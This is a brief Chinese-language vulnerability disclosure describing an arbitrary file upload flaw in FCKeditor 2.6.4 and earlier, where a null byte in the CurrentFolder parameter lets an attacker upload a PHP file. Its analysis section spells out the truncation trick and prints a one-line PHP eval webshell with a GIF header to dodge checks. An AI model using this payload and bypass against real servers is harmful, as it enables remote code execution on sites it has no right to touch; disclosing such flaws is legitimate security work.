简要描述
文件上传导致代码执行,fckeditor <= 2.6.4 任意文件上传漏洞, php coldfunsion应该KO了,asp表示很淡定,其他语言版本未测
详细说明
currentfolder过滤不给力,导致%00截断上传任意文件
漏洞证明
1 |
|
POC分析
我们看到这个请求主要是修改CurrentFolder为 fuck.php%00.gif
,通过%00截断上传,上传一个fuck.php文件。fuck.php文件里面写了一句话木马'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";
,GIF89a文件头只是为了绕过检测。